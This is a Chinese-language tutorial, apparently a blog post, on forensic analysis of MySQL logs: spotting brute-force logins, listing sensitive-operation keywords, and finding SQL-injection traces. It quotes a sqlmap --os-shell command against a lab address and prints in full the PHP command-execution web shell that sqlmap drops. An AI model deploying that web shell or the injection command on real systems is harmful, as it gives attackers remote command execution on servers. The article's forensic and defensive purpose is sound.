溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

怎么對(duì)MySQL日志進(jìn)行分析

發(fā)布時(shí)間:2021-12-04 11:39:09 來源:億速云 閱讀:301 作者:iii 欄目:數(shù)據(jù)安全

本篇內(nèi)容介紹了“怎么對(duì)MySQL日志進(jìn)行分析”的有關(guān)知識(shí),在實(shí)際案例的操作過程中,不少人都會(huì)遇到這樣的困境,接下來就讓小編帶領(lǐng)大家學(xué)習(xí)一下如何處理這些情況吧!希望大家仔細(xì)閱讀,能夠?qū)W有所成!

常見的數(shù)據(jù)庫攻擊包括弱口令、SQL注入、提升權(quán)限、竊取備份等。對(duì)數(shù)據(jù)庫日志進(jìn)行分析,可以發(fā)現(xiàn)攻擊行為,進(jìn)一步還原攻擊場景及追溯攻擊源。

1、Mysql日志分析

general query log能記錄成功連接和每次執(zhí)行的查詢,我們可以將它用作安全布防的一部分,為故障分析或黑客事件后的調(diào)查提供依據(jù)。

1、查看log配置信息
show variables like '%general%';
2、開啟日志
SET GLOBAL general_log = 'On';
3、指定日志文件路徑
#SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';

比如,當(dāng)我訪問 /test.php?id=1,此時(shí)我們得到這樣的日志:

190604 14:46:14       14 Connect    root@localhost on 
14 Init DB    test
14 Query    SELECT * FROM admin WHERE id = 1
14 Quit  `

我們按列來解析一下:

第一列:Time,時(shí)間列,前面一個(gè)是日期,后面一個(gè)是小時(shí)和分鐘,有一些不顯示的原因是因?yàn)檫@些sql語句幾乎是同時(shí)執(zhí)行的,所以就不另外記錄時(shí)間了。
第二列:Id,就是show processlist出來的第一列的線程ID,對(duì)于長連接和一些比較耗時(shí)的sql語句,你可以精確找出究竟是那一條那一個(gè)線程在運(yùn)行。
第三列:Command,操作類型,比如Connect就是連接數(shù)據(jù)庫,Query就是查詢數(shù)據(jù)庫(增刪查改都顯示為查詢),可以特定過慮一些操作。
第四列:Argument,詳細(xì)信息,例如 Connect    root@localhost on 意思就是連接數(shù)據(jù)庫,如此類推,接下面的連上數(shù)據(jù)庫之后,做了什么查詢的操作。

2、 登錄成功/失敗

我們來做個(gè)簡單的測試吧,使用我以前自己開發(fā)的弱口令工具來掃一下,字典設(shè)置比較小,2個(gè)用戶,4個(gè)密碼,共8組。

怎么對(duì)MySQL日志進(jìn)行分析

MySQL中的log記錄是這樣子:

Time                 Id        Command         Argument

190601 22:03:20    98 Connect   root@192.168.204.1 on 
98 Connect   Access denied for user 'root'@'192.168.204.1' (using password: YES)
103 Connect   mysql@192.168.204.1 on 
103 Connect   Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
104 Connect   mysql@192.168.204.1 on 
104 Connect   Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
100 Connect   root@192.168.204.1 on 
101 Connect   root@192.168.204.1 on 
101 Connect   Access denied for user 'root'@'192.168.204.1' (using password: YES)
99 Connect   root@192.168.204.1 on 
99 Connect   Access denied for user 'root'@'192.168.204.1' (using password: YES)
105 Connect   mysql@192.168.204.1 on 
105 Connect   Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
100 Query set autocommit=0
102 Connect   mysql@192.168.204.1 on 
102 Connect   Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
100 Quit  `

你知道在這個(gè)口令猜解過程中,哪個(gè)是成功的嗎?

利用爆破工具,一個(gè)口令猜解成功的記錄是這樣子的:

190601 22:03:20     100 Connect root@192.168.204.1 on 
100 Query    set autocommit=0
100 Quit

但是,如果你是用其他方式,可能會(huì)有一點(diǎn)點(diǎn)不一樣的哦。

Navicat for MySQL登錄:

190601 22:14:07   106 Connect   root@192.168.204.1 on 
106 Query  SET NAMES utf8
106 Query  SHOW VARIABLES LIKE 'lower_case_%'
106 Query  SHOW VARIABLES LIKE 'profiling'
106 Query  SHOW DATABASES

命令行登錄:

190601 22:17:25   111 Connect   root@localhost on 
111 Query  select @@version_comment limit 1
190601 22:17:56   111 Quit

這個(gè)差別在于,不同的數(shù)據(jù)庫連接工具,它在連接數(shù)據(jù)庫初始化的過程中是不同的。通過這樣的差別,我們可以簡單判斷出用戶是通過連接數(shù)據(jù)庫的方式。

另外,不管你是爆破工具、Navicat for MySQL、還是命令行,登錄失敗都是一樣的記錄。

登錄失敗的記錄:

102 Connect mysql@192.168.204.1 on 
102 Connect Access denied for user 'mysql'@'192.168.204.1' (using password: YES)

利用shell命令進(jìn)行簡單的分析:

#有哪些IP在爆破?
grep  "Access denied" mysql.log |cut -d "'" -f4|uniq -c|sort -nr
27 192.168.204.1

#爆破用戶名字典都有哪些?
grep  "Access denied" mysql.log |cut -d "'" -f2|uniq -c|sort -nr
13 mysql
12 root
1 root
1 mysql

在日志分析中,特別需要注意一些敏感的操作行為,比如刪表、備庫,讀寫文件等。關(guān)鍵詞:drop table、drop function、lock tables、unlock tables、load_file() 、into outfile、into dumpfile。

敏感數(shù)據(jù)庫表:SELECT * from mysql.user、SELECT * from mysql.func

3、 SQL注入入侵痕跡

在利用SQL注入漏洞的過程中,我們會(huì)嘗試?yán)胹qlmap的--os-shell參數(shù)取得shell,如操作不慎,可能留下一些sqlmap創(chuàng)建的臨時(shí)表和自定義函數(shù)。我們先來看一下sqlmap os-shell參數(shù)的用法以及原理:

1、構(gòu)造一個(gè)SQL注入點(diǎn),開啟Burp監(jiān)聽8080端口

sqlmap.py  -u http://192.168.204.164/sql.php?id=1 --os-shell --proxy=http://127.0.0.1:8080

HTTP通訊過程如下:

怎么對(duì)MySQL日志進(jìn)行分析

創(chuàng)建了一個(gè)臨時(shí)文件tmpbwyov.php,通過訪問這個(gè)木馬執(zhí)行系統(tǒng)命令,并返回到頁面展示。

tmpbwyov.php:

<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>

創(chuàng)建了一個(gè)臨時(shí)表sqlmapoutput,調(diào)用存儲(chǔ)過程執(zhí)行系統(tǒng)命令將數(shù)據(jù)寫入臨時(shí)表,然后取臨時(shí)表中的數(shù)據(jù)展示到前端。

通過查看網(wǎng)站目錄中最近新建的可疑文件,可以判斷是否發(fā)生過sql注入漏洞攻擊事件。

檢查方法:

1、檢查網(wǎng)站目錄下,是否存在一些木馬文件:

怎么對(duì)MySQL日志進(jìn)行分析

2、檢查是否有UDF提權(quán)、MOF提權(quán)痕跡

檢查目錄是否有異常文件

mysql\lib\plugin

c:/windows/system32/wbem/mof/

檢查函數(shù)是否刪除

select * from mysql.func

3、結(jié)合web日志分析。

“怎么對(duì)MySQL日志進(jìn)行分析”的內(nèi)容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識(shí)可以關(guān)注億速云網(wǎng)站,小編將為大家輸出更多高質(zhì)量的實(shí)用文章!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請(qǐng)聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI